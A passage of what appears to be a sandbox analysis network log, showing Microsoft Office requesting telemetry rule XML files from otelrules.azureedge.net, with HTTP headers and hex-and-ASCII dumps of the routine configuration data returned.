0a 20
              Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
              2024-11-29 23:41:10 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
              Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
              2024-11-29 23:41:10 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
              Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
              2024-11-29 23:41:10 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
              Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
              2024-11-29 23:41:10 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
              Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
              2024-11-29 23:41:10 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
              Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


              Session IDSource IPSource PortDestination IPDestination Port
              7192.168.2.44976913.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:12 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:12 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:12 GMT
              Content-Type: text/xml
              Content-Length: 450
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
              ETag: "0x8DC582BD4C869AE"
              x-ms-request-id: 4b7a9d83-201e-000c-6905-4179c4000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234112Z-174f7845968pght8hC1EWRyvxg00000003sg000000009k63
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:12 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


              Session IDSource IPSource PortDestination IPDestination Port
              8192.168.2.44977213.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:12 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:12 UTC494INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:12 GMT
              Content-Type: text/xml
              Content-Length: 2160
              Connection: close
              Vary: Accept-Encoding
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
              ETag: "0x8DC582BA3B95D81"
              x-ms-request-id: 6eac4bdd-a01e-006f-1c91-3f13cd000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234112Z-174f7845968xlwnmhC1EWR0sv800000010hg000000002kd5
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:12 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


              Session IDSource IPSource PortDestination IPDestination Port
              9192.168.2.44976813.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:12 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:12 UTC494INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:12 GMT
              Content-Type: text/xml
              Content-Length: 3788
              Connection: close
              Vary: Accept-Encoding
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
              ETag: "0x8DC582BAC2126A6"
              x-ms-request-id: 0b3277ea-501e-00a0-5e91-3f9d9f000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234112Z-174f7845968xlwnmhC1EWR0sv800000010kg0000000008ch
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:12 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


              Session IDSource IPSource PortDestination IPDestination Port
              10192.168.2.44977113.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:12 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:12 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:12 GMT
              Content-Type: text/xml
              Content-Length: 408
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
              ETag: "0x8DC582BB56D3AFB"
              x-ms-request-id: 44a2812f-d01e-0028-1207-427896000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234112Z-174f7845968j6t2phC1EWRcfe800000010u0000000006t31
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:12 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


              Session IDSource IPSource PortDestination IPDestination Port
              11192.168.2.44977013.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:12 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:12 UTC494INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:12 GMT
              Content-Type: text/xml
              Content-Length: 2980
              Connection: close
              Vary: Accept-Encoding
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
              ETag: "0x8DC582BA80D96A1"
              x-ms-request-id: 0a3cdbcf-401e-0016-597f-3f53e0000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234112Z-174f7845968psccphC1EWRuz9s00000010xg000000006nfv
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:12 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


              Session IDSource IPSource PortDestination IPDestination Port
              12192.168.2.44977513.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:14 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:14 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:14 GMT
              Content-Type: text/xml
              Content-Length: 471
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
              ETag: "0x8DC582BB10C598B"
              x-ms-request-id: 30944020-a01e-0053-5e8b-3f8603000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234114Z-174f7845968swgbqhC1EWRmnb400000010pg00000000mmw4
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:14 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              13192.168.2.44977313.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:14 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:14 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:14 GMT
              Content-Type: text/xml
              Content-Length: 474
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
              ETag: "0x8DC582B9964B277"
              x-ms-request-id: 8ccd6c39-f01e-0085-6e81-3f88ea000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234114Z-174f7845968qj8jrhC1EWRh41s00000010f000000000mrv9
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:14 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              14192.168.2.44977413.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:14 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:14 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:14 GMT
              Content-Type: text/xml
              Content-Length: 415
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
              ETag: "0x8DC582B9F6F3512"
              x-ms-request-id: 930937e0-c01e-0046-27a1-402db9000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234114Z-174f78459684bddphC1EWRbht400000010ag00000000cw25
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:14 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


              Session IDSource IPSource PortDestination IPDestination Port
              15192.168.2.44977713.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:14 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:15 UTC471INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:14 GMT
              Content-Type: text/xml
              Content-Length: 467
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
              ETag: "0x8DC582BA6C038BC"
              x-ms-request-id: 5e64b7e0-d01e-0049-7eb8-42e7dc000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234114Z-174f78459685m244hC1EWRgp2c00000010c000000000h8qb
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_MISS
              Accept-Ranges: bytes
              2024-11-29 23:41:15 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
